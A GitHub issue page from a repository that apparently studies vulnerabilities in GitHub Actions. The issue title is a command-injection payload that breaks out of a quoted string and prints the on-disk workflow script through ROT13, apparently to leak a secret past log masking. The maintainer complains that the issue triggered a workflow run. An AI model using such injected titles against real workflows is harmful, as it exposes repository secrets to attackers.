loqusion / action-vulnerabilities

Investigating vulnerabilities in GitHub Actions
0 stars 1 forks source link

Fiendish activities" --body "Devilish deeds"; cat "$0" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # #9

Open nefarious-actor opened 5 months ago

nefarious-actor commented 5 months ago

Practical example of leaking a secret from the generated on-disk script

loqusion commented 5 months ago

This issue triggered this workflow run (please stop)

nefarious-actor commented 5 months ago

No